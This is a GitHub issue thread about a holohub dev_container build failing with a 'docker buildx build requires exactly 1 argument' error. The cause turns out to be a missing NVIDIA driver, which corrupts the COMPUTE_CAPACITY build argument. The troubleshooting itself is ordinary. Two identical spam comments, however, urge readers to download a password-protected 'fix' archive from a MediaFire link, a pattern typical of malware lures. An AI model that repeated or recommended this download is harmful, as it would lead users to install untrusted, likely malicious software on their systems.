### ISSUE TITLE
ERROR: "docker buildx build" requires exactly 1 argument.

### ISSUE THREAD

**Issue by mxochicale** [nvidia-holoscan/holohub#479]
Hi Holohub team!, 

I was using holoscan-sdk-2.0.0 on laptop with ubuntu 22.04x64 and NVIDIARTXA20008GBLaptopGPU but just today I have got this error when launching my container:

> docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error running hook #0: error running hook: exit status 1, stdout: , stderr: Auto-detected mode as 'legacy'
nvidia-container-cli: initialization error: nvml error: driver not loaded: unknown.

So, I tried `sudo apt update && sudo apt upgrade` and rebooted my machine but it doesn't work. 
Now I have pulled latest changes of holohub repo [a5eaaa9](https://github.com/nvidia-holoscan/holohub/commit/a5eaaa978eab1302eb612c4a7b66158d9a691493) to build holohub with [MyDockerfile](https://github.com/nvidia-holoscan/holohub/blob/main/applications/endoscopy_depth_estimation/Dockerfile) but I am getting the follow issue with when building it in my local machine with ubuntu 22.04x64 with NVIDIARTXA20008GBLaptopGPU:  

> ./dev_container build --docker_file MyDockerfile
Could not find any GPU drivers on host. Defaulting build to target dGPU/CPU stack.
Could not find any GPU drivers on host. Defaulting build to target dGPU/CPU stack.
Could not find any GPU drivers on host. Defaulting build to target dGPU/CPU stack.
2024-08-27 06:20:20 $ export DOCKER_BUILDKIT=1
2024-08-27 06:20:20 $ docker build --build-arg BUILDKIT_INLINE_CACHE=1 --build-arg BASE_IMAGE=nvcr.io/nvidia/clara-holoscan/holoscan:v2.3.0-dgpu --build-arg GPU_TYPE=dgpu --build-arg COMPUTE_CAPACITY=NVIDIA-SMI has failed because it couldn't communicate with the NVIDIA driver. Make sure that the latest NVIDIA driver is installed and running. --network=host -f MyDockerfile -t holohub:ngc-v2.3.0-dgpu /home/mxochicale/repositories/holohub
ERROR: "docker buildx build" requires exactly 1 argument.
See 'docker buildx build --help'.
Usage:  docker buildx build [OPTIONS] PATH | URL | -
Start a build

It seems I am missing a [command](https://forums.docker.com/t/error-docker-buildx-build-requires-exactly-1-argument-with-vs-code/136577/10) but not exactly sure where to put in `dev_container` or if  I am missing anything else. PS. I have built again 2.0.0 and I get the same initial error ".... nvidia-container-cli: initialization error: nvml error: driver not loaded: unknown.
". 

Do you have any suggestions?

Thanks, Miguel

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tbirdso** [comment]
Hi @mxochicale , thanks for reaching out. It looks like there may be an issue with your driver installation, which is causing `COMPUTE_CAPACITY` to be set incorrectly when you call `./dev_container build`.

Could you please run the command `nvidia-smi` on your machine and share the output here?

**Comment by mxochicale** [comment]
Thanks @tbirdso 

I realised that I had a driver issue when I use nvidia-smi : "NVIDIA-SMI has failed because it couldn’t communicate with the NVIDIA driver". So, I have installed the newest version of cuda-12.6, and build and launch NVIDIA Holoscan SDK Version: 2.3.0. Here you have my log for ` nvidia-smi `: 
```
 nvidia-smi 
Tue Aug 27 20:45:48 2024       
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 560.28.03              Driver Version: 560.28.03      CUDA Version: 12.6     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|=========================================+========================+======================|
|   0  NVIDIA RTX A2000 8GB Lap...    Off |   00000000:01:00.0 Off |                  N/A |
| N/A   54C    P3             33W /   35W |     562MiB /   8192MiB |     81%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+
                                                                                         
+-----------------------------------------------------------------------------------------+
| Processes:                                                                              |
|  GPU   GI   CI        PID   Type   Process name                              GPU Memory |
|        ID   ID                                                               Usage      |
|=========================================================================================|
|    0   N/A  N/A      2435      G   /usr/lib/xorg/Xorg                              4MiB |
|    0   N/A  N/A     83513      C   python                                        540MiB |
+-----------------------------------------------------------------------------------------+
```
All is working!

Note.  
I noted the following warnings for  ./dev_container build --docker_file [Dockerfile](https://github.com/nvidia-holoscan/holohub/blob/main/applications/endoscopy_depth_estimation/Dockerfile) 

=> WARN: FromAsCasing: 'as' and 'FROM' keywords' casing do not match (line 2)                                                                                                                                0.0s
 => WARN: InvalidDefaultArgInFrom: Default value for ARG ${BASE_IMAGE} results in empty or invalid base image name (line 2)  

Thanks, Miguel

**Comment by wyli** [comment]
(saw the same error recently and I think this fixes the docker build call https://github.com/nvidia-holoscan/holohub/pull/708)
